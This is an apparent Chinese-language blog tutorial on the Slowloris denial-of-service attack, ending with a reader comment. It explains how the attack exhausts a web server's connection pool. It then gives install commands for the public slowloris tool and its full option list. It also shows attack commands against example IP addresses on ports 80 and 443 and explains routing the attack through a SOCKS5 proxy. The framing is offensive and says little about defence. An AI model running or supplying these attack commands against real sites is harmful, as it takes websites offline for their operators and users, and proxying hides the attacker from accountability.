Slowloris DOS攻击也可称为:Slowloris拒绝服务攻击;
常见的DDOS攻击有SYN flood、UDP flood、ICMP flood等。其中SYN flood是一种最为经典的DDOS攻击。其利用的是TCP协议设计中的缺陷,此处先避开不谈。
Slowloris简介:
Slowloris攻击则是利用Web Server的漏洞或设计缺陷,直接造成拒绝服务。
Slowloris是在2009年由著名Web安全专家RSnake提出的一种攻击方法,其原理是以极低的速度往服务器发送HTTP请求。由于Web Server对于并发的连接数都有一定的上限,因此:若是恶意地占用住这些连接不释放,那么Web Server的所有连接都将被恶意连接占用,从而无法接受新的请求,导致拒绝服务。
一、什么是Slowloris?
Slowloris基本上是一个影响线程服务器的HTTP拒绝服务攻击。它是这样工作的:
1、我们开始制作大量的HTTP请求。
2、我们定期发送headers(每秒〜15秒)以保持连接的打开状态。
3、除非服务器关闭,否则我们绝不会关闭连接。如果服务器关闭一个连接,我们创建一个新的继续执行相同的操作。
因此:这样就会耗尽服务器线程池,并且服务器无法回复其他人。
二、如何安装和运行slowloris?
1、使用pip进行安装及运行;
sudo pip3 install slowloris
slowloris example.com
2、使用git克隆安装及运行
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py example.com
三、slowloris命令详解
Slowloris是一款针对网站的低带宽压力测试工具;
用法:
slowloris.py [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x]
[--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT][--https][host]
必用参数:
host 机对其执行压力测试
可选参数:
-h,--help 显示此帮助信息并退出
-p PORT,--port PORT 网络服务器的端口,默认为80
-s SOCKETS, --sockets SOCKETS 测试中使用的套接字数量,默认150
-v,--verbose 增加日志记录
-ua,--randuseragents 用每个请求随机化用户代理
-x,--useproxy 使用SOCKS5代理进行连接
--proxy-host PROXY_HOST SOCKS5代理主机,默认127.0.0.1
--proxy-port PROXY_PORT SOCKS5代理端口,默认8080
--https 对请求使用HTTPS
四、slowloris攻击例子
1、攻击http端口:80
python slowloris.py 192.168.40.110
2、攻击https端口:443
python slowloris.py -p=443 --https 192.168.40.120
五、slowloris攻击效果:
当你攻击真正生效的时候,再去访问网站,就会出现网站打不开,如下图类似的情况;
SOCKS5代理支持
但是,如果您打算使用该 -x 选项来使用SOCKS5代理进行连接,而不是通过IP地址进行直接连接,则还需要安装PySocks库(或库的任何其他实现socks)。PySocks是来自SocksiPyGitHub用户@Anorov的一个分支(https://github.com/Anorov/PySocks),可以通过添加上面PySocks的pip命令或再次运行它来轻松安装,如下所示:
sudo pip3 install PySocks
然后,您可以使用该 -x 选项激活SOCKS5支持,使用--proxy-host 和 --proxy-port选项指定SOCKS5代理主机及其端口(如果它们与标准不同)127.0.0.1:8080。
总结:
Slowloris Dos攻击工具虽然说很好用,前提条件是网站一定要有“Slowloris Dos漏洞“才可以,否则你再怎么使用此工具也是没有效果的;
2019年05月03日 11:17:39 沙发
ddos很难防